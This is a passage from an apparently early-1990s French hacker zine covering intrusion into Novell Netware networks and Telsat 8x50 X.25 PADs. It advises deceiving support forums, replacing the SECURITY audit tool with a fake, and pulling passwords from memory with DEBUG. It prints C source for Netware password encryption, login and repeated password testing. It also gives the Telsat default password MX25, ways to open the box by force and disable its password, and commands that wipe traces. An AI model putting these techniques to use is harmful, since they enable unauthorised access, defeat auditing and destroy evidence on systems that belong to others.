été initialisé et désinitialisé et les erreures eventuelles.
Le forum Novell sur FIDO et le Netwire sur Compuserve sont träs
bons, mais si vous posez une question evitez de faire comprendre
que vous etes un hacker, la tournure de la phrase doit faire
comprendre que vous etes un supervisor curieux, ou un nouveau user
pas träs competent, etc
Lisez l'article de The Butler dans Phrack 35. Il est interressant
d'un point de vu utilisation du systäme, mais d'un niveau träs
faible.
Lisez tous se que vous trouvez sur la securité des LAN et le
programmation Novell.
Frequentez assiduement les board underground et faites des Text
Search pour 'Novell'.
Gardez votre compte secret (si vous devez le passer, ne le faites
qu'a des gens en lequel vous avez une confiance absolue) et surtout
restez discret: Ne créés pas de nouveau compte, ne changez pas les
PW des autres user, n'effacez rien, enfin generalement soyez un bon
Hacker et vous garderez votre compte longtemps.
Si vous desirez tenter un projet important sachez que SECURTIY est
un prog supervisor qui detecte les comptes sans PW, les comptes au
niveau SUPERVISOR, etc. Vous pourriez le remplacer par un prog qui
fait semblant que tout va bien (Verifiez que votre prog a bien meme
taille et meme date que le SECURITY d'origine).
Je connais un 'hole' dans Novell Netware 2.12 que je n'ais jamais
personnelement essayé:
Si vous avez access a un ordinateur loggé ou l'user est parti et
il n'a pas fait grand chose apräs son login voici une technique
pour trouver son PW:
Lancez debug et faites: -s 0000 ffff "USER_ID"
Notez les addressed et autour d'une de celle-ci doit se trouver le
PW, normalement autour de l'offset 8A00 du segment que Debug prend
par default.
Finalement jouez beaucoup à DOOM 1.2 sur votre LAN car à 4 c'est un
jeu superbe.
Appendix B: Source code:
~~~~~~~~~~~~~~~~~~~~~~~~
Ce qui suit est un source C qui ne fonctionne pas tel quel mais qui
a des fonctions superbes pour log, crypt, verify PW, etc. Regardez
le bien car il est assez dense mais träs instructif. Il vient des
Pays-Bas et je pense qu'il est l'oeuvre de Hack-Tic. Il y a une
addresse email si vous voulez contactez l'auteur.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <dos.h>
/* !!!!!!!!!!!!!! I didn't compile this version, so it might not be
ready to run, I just put together parts of different sources to
get it all in on file.
email itsme@utopia.hacktic.nl
func & getnewlogkey are internal server functions
used to generate logkeys
decode & decodepa are internal server functions
used to get new password from a set password call
encryptp : create encrypted password from userid, and password
getpassk : create login data from encrypted password & logkey
encrypt3 : create change pw date from login data for old pw +
encrypted new pw
decodepa : recreate encrypted pw from change pw data + old login data
*/
#define MAXPWLEN 64
#define MAXNAMELEN 48
typedef unsigned char u_char;
u_char tab0[256]= /* used by encrypt */
{/* 0 1 2 3 4 5 6 7 8 9 a b c d e f */
0x7,0x8,0x0,0x8,0x6,0x4,0xE,0x4,0x5,0xC,0x1,0x7,0xB,0xF,0xA,0x8,
0xF,0x8,0xC,0xC,0x9,0x4,0x1,0xE,0x4,0x6,0x2,0x4,0x0,0xA,0xB,0x9,
0x2,0xF,0xB,0x1,0xD,0x2,0x1,0x9,0x5,0xE,0x7,0x0,0x0,0x2,0x6,0x6,
0x0,0x7,0x3,0x8,0x2,0x9,0x3,0xF,0x7,0xF,0xC,0xF,0x6,0x4,0xA,0x0,
0x2,0x3,0xA,0xB,0xD,0x8,0x3,0xA,0x1,0x7,0xC,0xF,0x1,0x8,0x9,0xD,
0x9,0x1,0x9,0x4,0xE,0x4,0xC,0x5,0x5,0xC,0x8,0xB,0x2,0x3,0x9,0xE,
0x7,0x7,0x6,0x9,0xE,0xF,0xC,0x8,0xD,0x1,0xA,0x6,0xE,0xD,0x0,0x7,
0x7,0xA,0x0,0x1,0xF,0x5,0x4,0xB,0x7,0xB,0xE,0xC,0x9,0x5,0xD,0x1,
0xB,0xD,0x1,0x3,0x5,0xD,0xE,0x6,0x3,0x0,0xB,0xB,0xF,0x3,0x6,0x4,
0x9,0xD,0xA,0x3,0x1,0x4,0x9,0x4,0x8,0x3,0xB,0xE,0x5,0x0,0x5,0x2,
0xC,0xB,0xD,0x5,0xD,0x5,0xD,0x2,0xD,0x9,0xA,0xC,0xA,0x0,0xB,0x3,
0x5,0x3,0x6,0x9,0x5,0x1,0xE,0xE,0x0,0xE,0x8,0x2,0xD,0x2,0x2,0x0,
0x4,0xF,0x8,0x5,0x9,0x6,0x8,0x6,0xB,0xA,0xB,0xF,0x0,0x7,0x2,0x8,
0xC,0x7,0x3,0xA,0x1,0x4,0x2,0x5,0xF,0x7,0xA,0xC,0xE,0x5,0x9,0x3,
0xE,0x7,0x1,0x2,0xE,0x1,0xF,0x4,0xA,0x6,0xC,0x6,0xF,0x4,0x3,0x0,
0xC,0x0,0x3,0x6,0xF,0x8,0x7,0xB,0x2,0xD,0xC,0x6,0xA,0xA,0x8,0xD
};
u_char tab[32]= /* used by encrypt & encryptp */
{
0x48,0x93,0x46,0x67,0x98,0x3D,0xE6,0x8D,0xB7,0x10,0x7A,0x26,0x5A,0xB9,0xB1,0x35,
0x6B,0x0F,0xD5,0x70,0xAE,0xFB,0xAD,0x11,0xF4,0x47,0xDC,0xA7,0xEC,0xCF,0x50,0xC0
};
u_char tab1[8][2][16]= /* used by encrypt3 */
{ /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */
{{ 0xF,0x8,0x5,0x7,0xC,0x2,0xE,0x9,0x0,0x1,0x6,0xD,0x3,0x4,0xB,0xA},
{ 0x2,0xC,0xE,0x6,0xF,0x0,0x1,0x8,0xD,0x3,0xA,0x4,0x9,0xB,0x5,0x7}},
{{ 0x5,0x2,0x9,0xF,0xC,0x4,0xD,0x0,0xE,0xA,0x6,0x8,0xB,0x1,0x3,0x7},
{ 0xF,0xD,0x2,0x6,0x7,0x8,0x5,0x9,0x0,0x4,0xC,0x3,0x1,0xA,0xB,0xE}},
{{ 0x5,0xE,0x2,0xB,0xD,0xA,0x7,0x0,0x8,0x6,0x4,0x1,0xF,0xC,0x3,0x9},
{ 0x8,0x2,0xF,0xA,0x5,0x9,0x6,0xC,0x0,0xB,0x1,0xD,0x7,0x3,0x4,0xE}},
{{ 0xE,0x8,0x0,0x9,0x4,0xB,0x2,0x7,0xC,0x3,0xA,0x5,0xD,0x1,0x6,0xF},
{ 0x1,0x4,0x8,0xA,0xD,0xB,0x7,0xE,0x5,0xF,0x3,0x9,0x0,0x2,0x6,0xC}},
{{ 0x5,0x3,0xC,0x8,0xB,0x2,0xE,0xA,0x4,0x1,0xD,0x0,0x6,0x7,0xF,0x9},
{ 0x6,0x0,0xB,0xE,0xD,0x4,0xC,0xF,0x7,0x2,0x8,0xA,0x1,0x5,0x3,0x9}},
{{ 0xB,0x5,0xA,0xE,0xF,0x1,0xC,0x0,0x6,0x4,0x2,0x9,0x3,0xD,0x7,0x8},
{ 0x7,0x2,0xA,0x0,0xE,0x8,0xF,0x4,0xC,0xB,0x9,0x1,0x5,0xD,0x3,0x6}},
{{ 0x7,0x4,0xF,0x9,0x5,0x1,0xC,0xB,0x0,0x3,0x8,0xE,0x2,0xA,0x6,0xD},
{ 0x9,0x4,0x8,0x0,0xA,0x3,0x1,0xC,0x5,0xF,0x7,0x2,0xB,0xE,0x6,0xD}},
{{ 0x9,0x5,0x4,0x7,0xE,0x8,0x3,0x1,0xD,0xB,0xC,0x2,0x0,0xF,0x6,0xA},
{ 0x9,0xA,0xB,0xD,0x5,0x3,0xF,0x0,0x1,0xC,0x8,0x7,0x6,0x4,0xE,0x2}}
};
u_char tab3[16]= /* used by encrypt3 */
{ 0x3,0xE,0xF,0x2,0xD,0xC,0x4,0x5,0x9,0x6,0x0,0x1,0xB,0x7,0xA,0x8 };
u_char tab8[8][2][16]= /* used by decode */
{
{{0x8,0x9,0x5,0xC,0xD,0x2,0xA,0x3,0x1,0x7,0xF,0xE,0x4,0xB,0x6,0x0},
{0x5,0x6,0x0,0x9,0xB,0xE,0x3,0xF,0x7,0xC,0xA,0xD,0x1,0x8,0x2,0x4}},
{{0x7,0xD,0x1,0xE,0x5,0x0,0xA,0xF,0xB,0x2,0x9,0xC,0x4,0x6,0x8,0x3},
{0x8,0xC,0x2,0xB,0x9,0x6,0x3,0x4,0x5,0x7,0xD,0xE,0xA,0x1,0xF,0x0}},
{{0x7,0xB,0x2,0xE,0xA,0x0,0x9,0x6,0x8,0xF,0x5,0x3,0xD,0x4,0x1,0xC},
{0x8,0xA,0x1,0xD,0xE,0x4,0x6,0xC,0x0,0x5,0x3,0x9,0x7,0xB,0xF,0x2}},
{{0x2,0xD,0x6,0x9,0x4,0xB,0xE,0x7,0x1,0x3,0xA,0x5,0x8,0xC,0x0,0xF},
{0xC,0x0,0xD,0xA,0x1,0x8,0xE,0x6,0x2,0xB,0x3,0x5,0xF,0x4,0x7,0x9}},
{{0xB,0x9,0x5,0x1,0x8,0x0,0xC,0xD,0x3,0xF,0x7,0x4,0x2,0xA,0x6,0xE},
{0x1,0xC,0x9,0xE,0x5,0xD,0x0,0x8,0xA,0xF,0xB,0x2,0x6,0x4,0x3,0x7}},
{{0x7,0x5,0xA,0xC,0x9,0x1,0x8,0xE,0xF,0xB,0x2,0x0,0x6,0xD,0x3,0x4},
{0x3,0xB,0x1,0xE,0x7,0xC,0xF,0x0,0x5,0xA,0x2,0x9,0x8,0xD,0x4,0x6}},
{{0x8,0x5,0xC,0x9,0x1,0x4,0xE,0x0,0xA,0x3,0xD,0x7,0x6,0xF,0xB,0x2},
{0x3,0x6,0xB,0x5,0x1,0x8,0xE,0xA,0x2,0x0,0x4,0xC,0x7,0xF,0xD,0x9}},
{{0xC,0x7,0xB,0x6,0x2,0x1,0xE,0x3,0x5,0x0,0xF,0x9,0xA,0x8,0x4,0xD},
{0x7,0x8,0xF,0x5,0xD,0x4,0xC,0xB,0xA,0x0,0x1,0x2,0x9,0x3,0xE,0x6}}
};
u_char tab9[16]= /* used by decode */
{ 0xA,0xB,0x3,0x0,0x6,0x7,0x9,0xD,0xF,0x8,0xE,0xC,0x5,0x4,0x1,0x2 };
struct tod { u_char
curryear,
currmont,
currday ,
currhour,
currminu,
currseco,
currweek;
} tod;
int zeroseed=0;
int seed1=0,seed2=0;
/*
seed1 : *2 mod 947 -> cycle length 946
seed2 : *2 mod 941 -> cycle length 940
together : 946*940=889240=8* 111155 = 2^3*5*11*43*47
915 220 0
184 570 825 *
484 460 5102 *
945 2 6858
505 251 7936
191 563 20053
347 408 49641
317 626 50319
791 155 52249
91 286 59015 *
504 252 63514
3 938 74552
663 94 75630
932 109 82524 *
741 487 91346 *
476 468 104818
611 773 106975 ***
915 220 111155
*/
u_char func(int c)
{
if (seed1==0)
{
seed1=(tod.currmont<<4) + tod.currseco;
zeroseed++;
}
else
seed1<<=1;
if (seed1>=947)
seed1-=947;
if (seed2==0)
{
seed2=(tod.currday<<3) + tod.currminu;
zeroseed++;
}
else
seed2<<=1;
if (seed2>=941)
seed2-=941;
return (((u_char *)&tod)[(seed1+seed2)%7] +seed1+seed2+c)&0xff;
}
int newlogkey(int c, u_char *buf)
{
u_char *p; int i;
/*
**** logkey[c] is a table indexed by connection number
if (logkey[c]==0)
{
logkey[c]=salloc(8);
if (logkey[c]==0)
return(0x96); /* server out of memory */
}
p=logkey[c];
*/
p=buf;
for (i=0 ; i<8 ; i++)
*p++=func(c);
/* memcpy(logkey[c],buf,8); */
return(0);
}
unsigned int iswap(unsigned int nr)
{
_AH = *((char *) &nr);
_AL = *(((char *) &nr)+1);
}
unsigned long lswap(long l)
{
_DH = *((char *) &l);
_DL = *(((char *) &l)+1);
_AH = *(((char *) &l)+2);
_AL = *(((char *) &l)+3);
}
void dump(u_char *p,int l)
{
int i;
for (i=0 ; i<l ; i++)
printf("%02x ",p[i]);
}
/* leaves p & src intact
* char p[8] : part of old encrypted password
* char src[8] : part of change password data
* char dst[8] : part of new encrypted password (result)
*/
void decode(u_char *p, u_char *src, u_char *dst)
{
int i,j;
u_char buf[8];
char c;
memcpy(buf,src,8);
for (i=0 ; i<16 ; i++)
{
memset(dst,0,8);
for (j=0 ; j<16 ; j++)
{
if ((c=tab9[j])&1)
c=buf[c/2]>>4;
else
c=buf[c/2]&0xf;
if (j&1)
dst[j/2]|=(c<<4);
else
dst[j/2]|=c;
}
memcpy(buf,dst,8);
c=p[0];
for (j=0 ; j<7 ; j++)
p[j]=(p[j]>>4)|(p[j+1]<<4);
p[7]=(p[7]>>4)|(c<<4);
for (j=0 ; j<8 ; j++)
{
c=buf[j];
buf[j] = p[j] ^ (tab8[j][0][c&0xf] | (tab8[j][1][c>>4] << 4));
}
}
memcpy(dst,buf,8);
}
/*
* char p1[16] : old encrypted password
* char p2[16] : change password data
* char p3[16] : new encrypted password (result)
*/
void decodepa(u_char *p1, u_char *p2, u_char *p3)
{
decode(p1,p2,p3);
decode(p1+8,p2+8,p3+8);
}
/* char p1[32] : password xored with ID and itself ...
* char p2[16] : encrypted password (result)
*/
void encrypt(register u_char *p1, u_char *p2) /* changes both p1 & p2 */
{
int j;
int i;
u_char a;
u_char c=0;
for (j=0 ; j<2 ; j++)
for (i=0 ; i<32 ; i++)
{
a=(p1[(i+c)&0x1f] - tab[i]) ^ (p1[i]+c);
c+=a;
p1[i]=a;
}
memset(p2,0,16);
for (i=0 ; i<32 ; i++)
if (i&1)
p2[i/2] |= tab0[p1[i]]<<4;
else
p2[i/2] |= tab0[p1[i]];
}
/* char id[4] : UserID
* char src[len] : unencrypted password
* int len : length of unencrypted password
* char dst[16] : encrypted password (result)
*/
void encryptp(long id, u_char *src, int len, u_char *dst)
{
u_char buf[32];
u_char *p;
u_char *q=src;
int i;
for (p=q+len-1 ; *p--==0 && len ; len--)
;
memset(buf,0,32);
for ( ; len>=32 ; len-=32)
for (i=0 ; i<32 ; q++, i++)
buf[i] ^= *q;
p=q;
if (len>0)
for (i=0 ; i<32 ; i++)
{
if (q+len==p)
{
p=q;
buf[i]^=tab[i];
}
else
buf[i]^=*p++;
}
for (i=0 ; i<32 ; i++)
buf[i] ^= ((u_char *)&id)[i&3];
encrypt(buf,dst);
}
/* char logkey[8] : (requested with int21,ax=e3, fn 17 from server)
* char crpw[16] : encrypted password (with encryptp)
* char dst[8] : login data (result)
*/
void getpassk(long *logkey, u_char *crpw, u_char *dst)
{
u_char buf[32];
int i,j;
encryptp(logkey[0],crpw,16,buf);
encryptp(logkey[1],crpw,16,buf+16);
for (i=0, j=31 ; i<16 ; i++, j--)
buf[i]^=buf[j];
for (i=0 , j=15 ; i<8 ; i++, j--)
dst[i]=buf[i]^buf[j];
}
/* char p1[8] : part of old encrypted pw
* char p2[8] : part of new encrypted pw
* char p3[8] : part of change pw data (result)
*/
void encrypt3(register u_char *p1, u_char *p2, u_char *p3)
{
register int j;
u_char c;
u_char buf[8];
int i;
memcpy(buf,p2,8);
for (i=0 ; i<16 ; i++)
{
for (j=0 ; j<8 ; j++)
{
c=buf[j]^p1[j];
buf[j]= tab1[j][0][c&15] | (tab1[j][1][c>>4] <<4);
}
c=p1[7];
for (j=7 ; j>0 ; j--)
p1[j]=(p1[j]<<4) | (p1[j-1]>>4);
p1[0]= (c>>4) | (p1[0]<<4);
memset(p3,0,8);
for (j=0 ; j<16 ; j++)
{
c= tab3[j];
c= (tab3[j]&1) ? (buf[c/2]>>4) : (buf[c/2]&0xf) ;
p3[j/2] |= (j&1) ? (c<<4) : c ;
}
memcpy(buf,p3,8);
}
}
int shreq(int f, u_char *req, int rl, u_char *ans, int al)
{
struct REGPACK r;
r.r_cx=rl;
r.r_dx=al;
r.r_si=FP_OFF(req);
r.r_di=FP_OFF(ans);
r.r_ds=FP_SEG(req);
r.r_es=FP_SEG(ans);
r.r_ax=0xf200|f;
intr(0x21,&r);
return(r.r_ax&0xff);
}
int getlogkey(u_char *s)
{
u_char req[3];
req[0]=0; req[1]=1; req[2]=0x17;
return(shreq(0x17,req,3,s,8));
}
int getobjid(char *name, int type, long *id)
{
u_char req[MAXNAMELEN+6];
u_char rep[MAXNAMELEN+6];
int err;
req[2]=0x35;
*(int *)(req+3)=type;
req[5]=strlen(name);
strncpy((char *)req+6,name,MAXNAMELEN);
req[0]=0;
req[1]=req[5]+4;
err=shreq(0x17,req,req[1]+2,rep,MAXNAMELEN+6);
*id=*(long *)rep;
return(err);
}
int setpwcrypt(u_char *oldpw, int type, char *name, u_char *newpw, int l)
{
u_char req[MAXNAMELEN+31]; /* 8+16(pw's) + 1 + 3(type+len) + 3(header) */
req[2]=0x4b;
memcpy(req+3,oldpw,8);
*(int *)(req+11)=type;
req[13]=strlen(name);
strncpy((char *)req+14,name,48);
req[14+req[13]]=l;
memcpy(req+15+req[13],newpw,16);
req[0]=0;
req[1]=29+req[13];
return(shreq(0x17,req,req[1]+2,req,0));
}
setpw(char *name, int type, char *oldpw, char *newpw)
{
u_char req[8+MAXNAMELEN+2*MAXPWLEN];
int l=5;
req[2]=0x40;
*(int *)(req+3)=type;
req[l++]=strlen(name);
strncpy((char *)req+l,name,MAXNAMELEN);
l+=req[l];
req[l++]=strlen(newpw);
strncpy((char *)req+l,newpw,MAXPWLEN);
l+=req[l];
req[l++]=strlen(oldpw);
strncpy((char *)req+l,oldpw,MAXPWLEN);
l+=req[l];
req[0]=l>>8; req[1]=l&0xff;
return(shreq(0x17,req,l+2,req,0));
}
int changepw(char *name, int type, char *oldpw, char *newpw)
{
u_char logkey[8];
long id;
u_char oldcrpw[16];
u_char newcrpw[16];
int err;
int l;
if (getlogkey(logkey)==0)
{
err=getobjid(name,type,&id);
if (err)
return (err);
encryptp(id,(u_char *)oldpw,strlen(oldpw),oldcrpw);
encryptp(id,(u_char *)newpw,strlen(newpw),newcrpw);
getpassk((long *)logkey,oldcrpw,logkey);
encrypt3(oldcrpw,newcrpw,newcrpw);
encrypt3(oldcrpw+8,newcrpw+8,newcrpw+8);
l=((( min(63,strlen(newpw))^oldcrpw[0]^oldcrpw[1] )&0x7f)|0x40);
return(setpwcrypt(logkey,type,name,newcrpw,l));
}
else
return(setpw(name,type,oldpw,newpw));
}
int trypw(char *pw, int type, char *name)
{
u_char req[7+MAXNAMELEN+MAXPWLEN];
req[2]=0x3f;
*(int *)(req+3)=type;
req[5]=strlen(name);
strncpy((char *)req+6,name,MAXNAMELEN);
req[6+req[5]]=strlen(pw);
strncpy((char *)req+7+req[5],pw,MAXPWLEN);
req[0]=0;
req[1]=5+req[5]+req[6+req[5]];
return(shreq(0x17,req,req[1]+2,req,0));
}
int trypwcrypt(u_char *crpw, int type, char *name)
{
u_char req[14+MAXNAMELEN];
req[2]=0x4a;
memcpy(req+3,crpw,8);
*(int *)(req+11)=type;
req[13]=strlen(name);
strncpy((char *)req+14,name,MAXNAMELEN);
req[0]=0;
req[1]=12+req[13];
return(shreq(0x17,req,req[1]+2,req,0));
}
int testpw(char *name, int type, char *pw)
{
u_char logkey[8];
long id;
u_char crpw[16];
int err;
if (getlogkey(logkey)==0)
{
err=getobjid(name,type,&id);
if (err)
return (err);
encryptp(id,(u_char *)pw,strlen(pw),crpw);
getpassk((long *)logkey,crpw,logkey);
return(trypwcrypt(logkey,type,name));
}
else
return(trypw(name,type,pw));
}
int logincrypt(u_char *crpw, int type, char *name)
{
u_char req[14+MAXNAMELEN];
req[2]=0x18;
memcpy(req+3,crpw,8);
*(int *)(req+11)=type;
req[13]=strlen(name);
strncpy((char *)req+14,name,MAXNAMELEN);
req[0]=0;
req[1]=12+req[13];
return(shreq(0x17,req,req[1]+2,req,0));
}
int login(char *name, int type, char *pw)
{
u_char req[7+MAXNAMELEN+MAXPWLEN];
req[2]=0x14;
*(int *)(req+3)=type;
req[5]=strlen(name);
strncpy((char *)req+6,name,MAXNAMELEN);
req[6+req[5]]=strlen(pw);
strncpy((char *)req+7+req[5],pw,MAXPWLEN);
req[0]=0;
req[1]=5+req[5]+req[6+req[5]];
return(shreq(0x17,req,req[1]+2,req,0));
}
int dologin(char *name, int type, char *pw)
{
u_char logkey[8];
long id;
u_char crpw[16];
int err;
if (getlogkey(logkey)==0)
{
err=getobjid(name,type,&id);
if (err)
return (err);
encryptp(id,(u_char *)pw,strlen(pw),crpw);
getpassk((long *)logkey,crpw,logkey);
return(logincrypt(logkey,type,name));
}
else
return(login(name,type,pw));
}
int setconn(int c)
{
struct REGPACK r;
r.r_ax=0xf000; /* set preferred connection nr */
r.r_dx=c+1;
intr(0x21,&r);
return(r.r_ax&0xff);
}
int scanobj(char *name, int *type, long *id, int *err)
{
u_char req[10+MAXNAMELEN];
/* int length
* char type
* long id (-1 for wildcard)
* int type (-1 for wildcard)
* char len
* char objname[len]
*/
u_char rep[9+MAXNAMELEN];
/* long id 0
* int type 4
* char name[48] 6
* char object_flags 54
* char security_flags 55
* char more 56
*/
int objlen=strlen(name);
req[2]=0x37; /* scan object list */
*(long *)(req+3)=*id;
*(int *)(req+7)=*type;
req[9]=objlen; /* string : obj name */
strncpy((char *)req+10,name,MAXNAMELEN);
req[0]=0; req[1]=8+objlen;
*err=shreq(0x17, req, req[1]+2+(req[0]<<8), rep, 0x39);
if (*err) return(0);
strncpy(name,(char *)rep+6,MAXNAMELEN);
*type=*(int *)(rep+4);
*id=*(long *)rep;
return(rep[56]);
}
void main(int argc, char **argv)
{
char pw[MAXPWLEN];
char newpw[MAXPWLEN];
int err;
int i;
err=setconn(0);
if (err)
printf("failed setconn : %02x\n",err);
if (argc>3)
{
debug=atoi(argv[1]);
argv++;
argc--;
}
if (argc<3)
{
printf("Usage : nov F username\n");
printf(" F = t l s\n");
exit(1);
}
strupr(argv[2]);
while (kbhit()) getch();
switch(argv[1][0])
{
case 't': /* verifybinderyovbjectpassword */
strcpy(pw,strupr(getpass("enter pw : ")));
do {
err=testpw(argv[2],0x100,pw);
printf("%02x",err);
} while (argv[1][1] && !kbhit());
break;
case 'l': /* loginbinderyobject */
strcpy(pw,strupr(getpass("enter pw : ")));
do {
err=dologin(argv[2],0x100,pw);
printf("%02x",err);
} while (argv[1][1] && !kbhit());
break;
case 's': /* setbinderyobjectpassword */
strcpy(pw,strupr(getpass("enter old pw : ")));
strcpy(newpw,strupr(getpass("enter new pw : ")));
do {
err=changepw(argv[2],0x100,pw,newpw);
printf("%02x",err);
} while (argv[1][1] && !kbhit());
break;
}
while (kbhit()) getch();
}
Appendix C: Comment Novell crypte les PW:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Les versions avant la 2.15c transmettent les PW non cryptés au
serveur qui les crypte lui-meme. Cette section s'occupe de
l'apräs 2.15c.
1. Login vous demande le serveur (ou prends celui par default) et
votre USER_ID.
2. Server/User_ID sont transmis au serveur et vous etes attachés à
ce serveur.
3. Login envoit un LOGOUT NCP pour effacer toute autre connection
que vous pouvez avoir deja avec ce serveur.
4. Login demande un votre OBJECT_ID et une clé de login au serveur.
5. Le serveur genere une clé 8 byte et l'envoit à Login.
6. Login demande votre PW.
7. Login crypte OBJECT_ID, clé et PW pour faire un 16 byte PW value.
[ A mon avis la clé n'est pas utilisé, le chiffrement se fait
uniquement sur OBJECT_ID et PW qui sont connus à l'avance et, aussi
à mon avis, ne changent pas. ]
8. Login crypte cette PW value avec la clé à pour faire un 8 byte
PW value et l'envoit au serveur.
9. Le serveur recupere la 16 byte PW value qu'il a stocké dans la
Bindery et la crypte avec la meme clé qu'il a envoyé à Login. Il
compare ensuite les 2 8 byte PW values. Si ils sont identiques le
PW doit etre bon.
Appendix D: L'auteur:
~~~~~~~~~~~~~~~~~~~~~
Mon handle est ARSCENE et je n'ais pas d'email actuellement. Pour
me contacter adressez vous au journal et ils me feront parvenir
l'info.
Voila, c'est tout. Merci de m'avoir lut et j'espere avoir
l'occasion d'ecrire un autre article pour ce zine bientot.
Bonne chance et bon Hacking...
Arscene.
ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.5
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement. (regardez la date!!!!)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 4 | [NeurAlien] 01/09/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . . . . .
^ ^ ^ ^ ^ ^
/|\/^\/|\/^\/|\/^\/|\/^\/|\/^\/|\/^\
. _/ \_ .
\ Telsat 8x50 /
. _/ de \_ .
\ SATELCOM /
. _/ Par NeurAlien \_ .
\ /
\|/\_/\|/\_/\|/\_/\|/\_/\|/\_/\|/\_/
. . . . . .
>Presentation:
=============
Le Telsat 8x50 est un systàme d'assemblage déssassemblage de paquet pour
terminaux asynchrones. Il permet de concentrer 4, 10 ou 16 terminaux sur une
ligne x25: un simple PAD. Il permet aussi de dispatcher une liaison x25 sur
divers liasons privées vers divers équipements.
Ce serveur de terminaux est une "boite" de dimensions 39,4 x 11,4 x 35,6 cm.
En dessous du boitier, il y a un panneau de controle mais pour y acceder, il
faut la clé Satelcom. Prenez alors une petite cuillere, limez son manche pour
inverser l'arrondi du bout:
__________... _________...
/ \
| =======> |
\__________... /_________...
(ou plus simplement un tournevis)
Ainsi, pour ouvrir, enlevez les vis sur les 2 cotés de la boite et inserez
la petite cuillere horizontalement dans les fentes le long de la rainure du
milieu. Une fois ceci fait, relevez la partie contenante de la cuillere vers
le haut... Le boitier s'ouvre.
A partir d'ici, vous pouvez faire un reset du PAD.
>Caracteristiques reseau:
========================
La capacité de sous adressage du T8X50 se limite a 2 octets.
Donc il y a 100 sous adresses possibles
>Utilisations et commandes en local:
===================================
Quand on se connecte sur un T8X50 en local, on recoit:
Message d'accueil:
La valeur generique du prompt x28 est:
TELSAT 8X50 VOIE : XX (ou XX est le numero de voie)
taille maximum: 32
Message bulletin:
Pas de valeur generique.
Taille maximum: 120
Prompt:
La valeur generique du prompt x28 est:
==>
Taille maximum: 16
Mais tous ces messages peuvent àtre modifiés.
Normalement, quand vous vous connectez en local ou pseudo-local avec un modem
sur ligne privée, vous devez recevoir le premier message puis le prompt.
Si cela n'arrive pas, il faut taper:
<cr>.<cr> (return point return)
ou
<BREAK><cr>.<cr>
Quand on appelle un serveur en x28 et que l'on veut preciser une sous adresse,
on utilise pour cela le caractere '/'.
Par exemple, si l'on veut appeller la sous adresse 56 au numero 175020123, il
faudra faire la demande comme ceci:
175020123/56
Quand on veut faire la meme chose en X121, on supprime le slash.
(n'oubliez pas que le NUA en x121 ne doit pas depasser 15 caracteres)
On peut indiquer un mot de passe ou des donnees utilisateur qui seront
transmises dans le paquet d'appel.
mot de passe: P
exemple de commande a taper:
175020123P(TEST) ---> appel de 175020123 avec mot de passe TEST
Apres le P, il n'y aura plus d'echo, donc, tout ce que l'utilisateur verra
sera:
==> 175020123P
données utilisateur: D
exemple de commande à taper:
175020123D(HELLO) ---> appel de 175020123 avec donnee utilisateur HELLO
On peut aussi effectuer des appels en PCV par la commande:
R-1xxxxxxxx
exemple de commande à taper:
R-175020123 ---> appel de 175020123 en PCV.
On peut appeler d'un groupe ferme d'abonne comme ceci:
G xx-1xxxxxxxx
oó xx est numérique.
On peut aussi cumuler des commandes:
R,Gxx-1xxxxxxxx
>Acces à la Porte de commande:
=============================
Pour acceder à la porte de commande, il y a trois maniäres:
1/ Par la porte de commande physique:
Elle se situe sur la voie 0.
Il suffit de s'y connecter comme on s'y connecte d'habitude.
Ensuite, le 8X50 demande un mot de passe qui est par defaut:
MX25
2/ Par une voie quelconque du Telsat:
Il suffit de taper au prompt ==>
00/99
ou
<adresse du Telsat>/99
La on recoit le message: COM
Il faut repondre par RETURN
Ensuite on tape le mot de passe generique: MX25
3/ Par le x25:
Il suffit d'appeler l'adresse du Telsat et la sous adresse 99:
adresse telsat: 175 020 123
sous adresse: 99
17502012399
On recoit le message: COM
on tape RETURN
on donne le mot de passe generique: MX25
>Configuration optimale pour la plus grande communicabilité:
===========================================================
>>>>>>>>>>Entrer dans le menu de configuration avant tout essai!!!!!!!!
SELECTION 1 : VOIE/CHANNEL
OPTION D'APPEL 1: tout sauf 32. (valeur combinee de 0 a 128 sauf 32)
(0,1,2,4,8,16,64,128 et combinaison) (0==correct)
128 64 32 16 8 4 2 1 0
* * 0 * * * * * *
SELECTION 5 : LIGNE x25
MOT DE PASSE: rien, effacer la valeur. (MX25 ou **** sont les valeurs à
entrer)
APPEL ENTRANT: La valeur doit etre impaire (PCV accepte) (9==correct)
et sans la valeur 2.
32 16 8 4 2 1
* * * * 0 1
APPEL SORTANT: 32 16 8 4 2 1
* * 0 * 0 *
(bit 1: 1: ne communique pas l'adresse demandeur)
0: lui communique
TYPE DE NUI: valeur impérative: 0
VALIDATION DU NUI: valeur impérative si vous accedez en local
ou pseudo local.: 0
SELECTION 8:
Classe 1: la valeur ne doit pas etre 00 (valeur correcte==99)
Classe 2: la valeur ne doit pas etre 00 ni 99 mais comprise entre 17 et 98
compris.
Journal des evenements: valeur imperative lors de l'utilisation: 0
SELECTION 15:
valeur 1: 0
cela permet de se connecter localement d'une voie sur une autre.
SELECTION 16:
Il est utile de lire toutes les entrees. (entrer 1)
>Utilisation de la porte de commande:
====================================
Pour interdir l'acces a une voie:
2
Pour deconnecter une voie (==2 mais immediat):
3
Pour revalider l'acces a une voie (inverse de 2 et 3):
4
Pour deconnecter tout le monde et mettre la ligne hors service:
6
Remettre la ligne en service (impossible par reseau):
7
Pour effacer les stats et les traces:
9
Pour deconnecter tout le monde et rebooter a froid le pad:
10
Pour prendre les valeurs par defaut:
11
>Appel entrant sur un T8X50:
===========================
